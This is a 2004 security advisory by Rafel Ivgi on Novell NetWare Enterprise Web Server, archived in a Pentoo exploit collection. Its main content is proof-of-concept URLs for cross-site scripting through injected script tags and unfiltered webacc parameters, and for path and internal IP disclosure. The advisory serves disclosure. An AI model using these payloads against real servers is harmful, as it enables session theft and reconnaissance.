home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / novellEnterprise / novellNetware.txt

< prev

Wrap

Text File  |  2005-02-12  |  5KB  |  136 lines

---

1. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2.  
3. Software:        Novell Netware
4. Vendor:           http://www.Novell.com
5. Versions:        NetWare-Enterprise-Web-Server/5.1/6.0
6. Platforms:       Windows
7. Bug:                 Multiple Vulnerabilities
8. Risk:                Medium
9. Exploitation:   Remote with browser
10. Date:               6 Jan 2004
11. Author:            Rafel Ivgi, The-Insider
12. e-mail:             the_insider@mail.com
13. web:                http://theinsider.deep-ice.com
14.  
15. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
16.  
17. 1) Introduction
18. 2) Bug
19. 3) The Code
20.  
21. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
22.  
23. ===============
24. 1) Introduction
25. ===============
26.  
27. Novell NetWare-Enterprise-Web-Server is a strong and steady webserver.
28. It is used by big company's and some governments.
29.  
30. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
31.  
32. ======
33. 2) Bug
34. ======
35.  
36. Cross Site Scripting and Local Path Disclosure Vulnerabillity:
37. ----------------------------------------------------------------------------
38. -------
39. The Vulnerabillity is Cross Site Scripting type. If an attacker will request
40. the one of following url from the server
41.  
42. http://<host>/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl    -   Cross Site
43. Scripting Vulnerabillity
44. http://<host>/perl/<script>alert('XSS')</script>.pl          -   Cross Site
45. Scripting Vulnerabillity
46. http://<host>/perl/\/.pl                                                    
47.      -   cgi2perl running on the server contains Local Path Disclosure
48. http://<host>/servlet/webacc?User.id="><script>alert('XSS')</script>     -
49. Cross Site Scripting Vulnerabillity - Unfiltered Parameters
50. http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
51. Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver
52. sion="><script>alert('XSS')</script>      -   Cross Site Scripting
53. Vulnerabillity - Unfiltered Parameters
54. http://<host>/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas 
55.    -   Cross Site Scripting Vulnerabillity
56.  
57. If all of these circumstances are met, an attacker may be able to exploit
58. this issue
59. via a malicious link containing arbitrary HTML and script code as part of
60. the hostname.
61. When the malicious link is clicked by an unsuspecting user, the
62. attacker-supplied HTML
63. and script code will be executed by their web client. This will occur
64. because the server
65. will echo back the malicious hostname supplied in the client's request,
66. without sufficiently
67. escaping HTML and script code.
68.  
69. Attacks of this nature may make it possible for attackers to manipulate web
70. content or to
71. steal cookie-based authentication credentials. It may be possible to take
72. arbitrary actions as the victim user.
73.  
74. Internal IP Disclosure:   -   and much more server info...
75. -----------------------------
76. http://<host>/examples/jsp/snp/snoop.jsp
77. http://<host>/servlet/SnoopServlet
78. http://<host>/nsn/env.bas
79. http://<host>/lcgi/lcgitest.nlm
80.  
81. Load .htt files:
82. -------------------
83. http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
84. Oq&User.interface=frames&error=c:\windows\web\folder
85.  
86. Directory Listing:
87. -----------------------
88. /com/
89. /com/novell/
90. /com/novell/webaccess
91. /ns-icons/
92.  
93. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
94.  
95. ===========
96. 3) The Code
97. ===========
98.  
99. http://<host>/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl    -   Cross Site
100. Scripting Vulnerabillity
101. http://<host>/perl/<script>alert('XSS')</script>.pl          -   Cross Site
102. Scripting Vulnerabillity
103. http://<host>/perl/\/.pl                                                    
104.      -   cgi2perl running on the server contains Local Path Disclosure
105. http://<host>/servlet/webacc?User.id="><script>alert('XSS')</script>     -
106. Cross Site Scripting Vulnerabillity - Unfiltered Parameters
107. http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
108. Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver
109. sion="><script>alert('XSS')</script>      -   Cross Site Scripting
110. Vulnerabillity - Unfiltered Parameters
111. http://<host>/examples/jsp/snp/snoop.jsp - Internal IP Disclosure
112. http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
113. Oq&User.interface=frames&error=<htt file>  - Load .htt files
114. http://<host>/servlet/SnoopServlet - Internal IP Disclosure
115. http://<host>/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas 
116.    -   Cross Site Scripting Vulnerabillity
117.  
118. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
119.  
120. A lot of thanks to
121. Stuart Moore:
122. **************************
123. SecurityTracker.com
124. SecurityGlobal.net LLC
125. smoore@securityglobal.net
126. +1 301 495 5930 voice
127. +1 413 691 4346 fax
128. ****************************
129. Without his help this wouldn't have been published.
130.  
131. ---
132. Rafel Ivgi, The-Insider
133. http://theinsider.deep-ice.com
134.  
135. "Things that are unlikeable, are NOT impossible."
136.